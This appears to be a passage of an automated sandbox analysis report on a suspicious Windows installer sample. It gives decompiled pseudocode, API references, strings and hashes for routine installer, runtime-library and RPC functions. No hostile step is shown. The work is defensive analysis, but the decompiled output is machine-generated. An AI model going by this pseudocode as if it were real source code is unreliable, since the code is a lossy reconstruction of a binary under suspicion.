                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2420
                                                                                                • NDRSContextMarshall2.RPCRT4(?,?,?,?,00000000,00000000), ref: 6EDA2441
                                                                                                Strings
                                                                                                • (%p, %p, %p), xrefs: 6EDA23BF
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA240E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionMarshall2Raise
                                                                                                • String ID: (%p, %p, %p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3146093750-1272072389
                                                                                                • Opcode ID: a24802865635c5db69758f788b2c23a2c79b80d1c3b5d2b288ea265a93eeaf63
                                                                                                • Instruction ID: 4cfdd041eb7649c41f41c64cbf0efedf5ffc8bf3298785b9ce5697595f6ed8ec
                                                                                                • Opcode Fuzzy Hash: a24802865635c5db69758f788b2c23a2c79b80d1c3b5d2b288ea265a93eeaf63
                                                                                                • Instruction Fuzzy Hash: 6921CC79600204EFD704CF48D891E5A7BA6AF88754F14C148FA494F396D631E951CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAA2F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAA32D
                                                                                                • RpcRaiseException.RPCRT4(0000000E), ref: 6EDAA34A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: -- %p$overflow of adjusted_len %ld, len %ld
                                                                                                • API String ID: 3997070919-2781439172
                                                                                                • Opcode ID: 89b1826f1f873967acfd4a8ab2ed3ba8f967de14ff901029035e7bad009cb21a
                                                                                                • Instruction ID: 3d61bb75c8c2765538e07b268227b88a81a0e0ae689726e6e674744c32ff31c0
                                                                                                • Opcode Fuzzy Hash: 89b1826f1f873967acfd4a8ab2ed3ba8f967de14ff901029035e7bad009cb21a
                                                                                                • Instruction Fuzzy Hash: C821D5B5A00208EFCB04DF98C884A9EBBB5BF49314F10C298E919AB345D771AA41CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA2310, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 6EDA7400: _memset.LIBCMT ref: 6EDA7421
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2380
                                                                                                • NDRCContextMarshall.RPCRT4(?,?), ref: 6EDA2391
                                                                                                Strings
                                                                                                • (%p, %p, %d), xrefs: 6EDA231F
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA236E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionMarshallRaise_memset
                                                                                                • String ID: (%p, %p, %d)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 2061417460-413767583
                                                                                                • Opcode ID: 0af70368f66b779723b4a28cb68613657397be3a3db9a085776d2c3c43e9005d
                                                                                                • Instruction ID: a8c6764338723ec73ff8bebce8d72bb44271bccdd093a51fac12427db2f8b640
                                                                                                • Opcode Fuzzy Hash: 0af70368f66b779723b4a28cb68613657397be3a3db9a085776d2c3c43e9005d
                                                                                                • Instruction Fuzzy Hash: 221100B9600104EFCB04CF98D890D597BA6FF49358B14C148FA498F346D731E991CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAAFA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001,?,?,?,?,?,?,6EDA3C70,?,00000000), ref: 6EDAAFE9
                                                                                                • _memmove.LIBCMT ref: 6EDAB016
                                                                                                Strings
                                                                                                • pointer is the same as the buffer, xrefs: 6EDAAFFA
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6EDAAFD7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u$pointer is the same as the buffer
                                                                                                • API String ID: 4056999889-2199830383
                                                                                                • Opcode ID: 4fac68bbc4de2ac7a511ae14de528a6480d2d075628f632a59307707ea60f1e1
                                                                                                • Instruction ID: ed77dc470c1e268d9c6ef7c6ca3c900f8f457b5eabc48486b87cb4be97412cc7
                                                                                                • Opcode Fuzzy Hash: 4fac68bbc4de2ac7a511ae14de528a6480d2d075628f632a59307707ea60f1e1
                                                                                                • Instruction Fuzzy Hash: 1D11CBB5600209EFCB04DF88D890D9ABBA6BF48354B15C648FD494B346D731FA51CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040518B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0040518B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42bfe0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                0x00405194
                                                                                                0x004051b0
                                                                                                0x004051b8
                                                                                                0x004051bd
                                                                                                0x00000000
                                                                                                0x004051c3
                                                                                                0x004051c7

                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                                                                                                • CloseHandle.KERNEL32(?), ref: 004051BD
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                                                                                • Error launching installer, xrefs: 0040519E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                • API String ID: 3712363035-1785902839
                                                                                                • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                                                                • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                                                                                • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                                                                                • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040541E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0040541E(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                                                                                                0x0040541f
                                                                                                0x00405436
                                                                                                0x0040543e
                                                                                                0x0040543e
                                                                                                0x00405446

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                                                                                                • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-3081826266
                                                                                                • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                                • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                                                                                • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                                                                                • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDB7376, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDB7376(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E6EDB1E23( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E6EDB71BC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E6EDB2A94(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                                                                                0x6edb737e
                                                                                                0x6edb7383
                                                                                                0x6edb739d
                                                                                                0x00000000
                                                                                                0x6edb739d
                                                                                                0x6edb7385
                                                                                                0x6edb738a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edb738f
                                                                                                0x6edb73ac
                                                                                                0x6edb73b1
                                                                                                0x6edb73b4
                                                                                                0x6edb73bb
                                                                                                0x6edb73da
                                                                                                0x6edb73e1
                                                                                                0x6edb73e3
                                                                                                0x6edb7427
                                                                                                0x6edb7436
                                                                                                0x6edb7444
                                                                                                0x6edb7446
                                                                                                0x6edb7456
                                                                                                0x6edb7456
                                                                                                0x6edb745a
                                                                                                0x6edb745c
                                                                                                0x6edb745f
                                                                                                0x6edb745f
                                                                                                0x6edb745f
                                                                                                0x6edb745f
                                                                                                0x00000000
                                                                                                0x6edb7465
                                                                                                0x6edb7448
                                                                                                0x6edb7448
                                                                                                0x6edb744d
                                                                                                0x6edb744d
                                                                                                0x6edb7450
                                                                                                0x00000000
                                                                                                0x6edb7450
                                                                                                0x6edb73e5
                                                                                                0x6edb73e8
                                                                                                0x6edb73ec
                                                                                                0x6edb7415
                                                                                                0x6edb7415
                                                                                                0x6edb7418
                                                                                                0x6edb7418
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edb741a
                                                                                                0x6edb741e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edb7420
                                                                                                0x6edb7420
                                                                                                0x00000000
                                                                                                0x6edb7420
                                                                                                0x6edb73ee
                                                                                                0x6edb73f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edb73f5
                                                                                                0x6edb7408
                                                                                                0x6edb740e
                                                                                                0x6edb7411
                                                                                                0x6edb7413
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edb7413
                                                                                                0x6edb73bd
                                                                                                0x6edb73c0
                                                                                                0x6edb73c2
                                                                                                0x6edb73c7
                                                                                                0x6edb73c7
                                                                                                0x6edb73cc
                                                                                                0x00000000
                                                                                                0x6edb73cc
                                                                                                0x6edb7391
                                                                                                0x6edb7396
                                                                                                0x6edb739a
                                                                                                0x6edb739a
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6EDB73AC
                                                                                                • __isleadbyte_l.LIBCMT ref: 6EDB73DA
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6EDB7408
                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 6EDB743E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                • String ID:
                                                                                                • API String ID: 3058430110-0
                                                                                                • Opcode ID: 93eb5cba68d9bfdf7b6836fdce471a294143fb223ea5bd87cb81acafed9097c4
                                                                                                • Instruction ID: b5680dc7430a9a6987ea2ca31e7191ae6478d37cc6fec5ed5bdb44931e3f2fb4
                                                                                                • Opcode Fuzzy Hash: 93eb5cba68d9bfdf7b6836fdce471a294143fb223ea5bd87cb81acafed9097c4
                                                                                                • Instruction Fuzzy Hash: 4331BCB0604206FFEB118FB5C844BAE7FB9AF41311F014628E8668B2D0F730D861DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                0x00401ec7
                                                                                                0x00401ecf
                                                                                                0x00401ed4
                                                                                                0x00401ed9
                                                                                                0x00401edd
                                                                                                0x00401ee0
                                                                                                0x00401ee2
                                                                                                0x00401ee9
                                                                                                0x00401ef2
                                                                                                0x00401efa
                                                                                                0x00401efd
                                                                                                0x00401f12
                                                                                                0x00401f18
                                                                                                0x00401f2b
                                                                                                0x00401f34
                                                                                                0x00401f40
                                                                                                0x00401f45
                                                                                                0x00401f45
                                                                                                0x00401f2b
                                                                                                0x00401f48
                                                                                                0x00401b75
                                                                                                0x00401b75
                                                                                                0x00401efd
                                                                                                0x00402880
                                                                                                0x0040288c

                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                  • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1404258612-0
                                                                                                • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                                • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                                                                                • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                                                                                • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDB1ECC, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDB1ECC(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E6EDB241D(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E6EDB1F52(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E6EDB2698(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E6EDB25D7(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                                                0x6edb1ecf
                                                                                                0x6edb1ed5
                                                                                                0x6edb1f48
                                                                                                0x00000000
                                                                                                0x6edb1edc
                                                                                                0x6edb1edc
                                                                                                0x6edb1edf
                                                                                                0x6edb1efa
                                                                                                0x6edb1efd
                                                                                                0x6edb1f1d
                                                                                                0x6edb1f2f
                                                                                                0x6edb1eff
                                                                                                0x6edb1eff
                                                                                                0x6edb1f02
                                                                                                0x00000000
                                                                                                0x6edb1f04
                                                                                                0x6edb1f16
                                                                                                0x6edb1f16
                                                                                                0x6edb1f02
                                                                                                0x6edb1f4d
                                                                                                0x6edb1f51
                                                                                                0x6edb1ee1
                                                                                                0x6edb1ef9
                                                                                                0x6edb1ef9
                                                                                                0x6edb1edf

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                • String ID:
                                                                                                • API String ID: 3016257755-0
                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                • Instruction ID: 7ee4221b030a802b15b35080123d7bc1ac352205fb26a3f8d68400a0edcde976
                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                • Instruction Fuzzy Hash: 980166B300418AFBCF024FC4DC11CEE3F66BB1C258B448854FA6A99020E736C6B5EB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004054B2, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004054B2(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405264
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405449(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                                                0x004054bb
                                                                                                0x004054bb
                                                                                                0x004054c2
                                                                                                0x004054c5
                                                                                                0x004054ca
                                                                                                0x004054dd
                                                                                                0x004054f7
                                                                                                0x00000000
                                                                                                0x004054f7
                                                                                                0x004054e1
                                                                                                0x004054e2
                                                                                                0x004054e5
                                                                                                0x004054e6
                                                                                                0x004054ee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004054f0
                                                                                                0x004054f3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004054f3
                                                                                                0x00000000
                                                                                                0x004054d3
                                                                                                0x00000000
                                                                                                0x004054d4

                                                                                                APIs
                                                                                                • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004054C0
                                                                                                • CharNextA.USER32(00000000), ref: 004054C5
                                                                                                • CharNextA.USER32(00000000), ref: 004054D4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CharNext
                                                                                                • String ID: dR@
                                                                                                • API String ID: 3213498283-1322173608
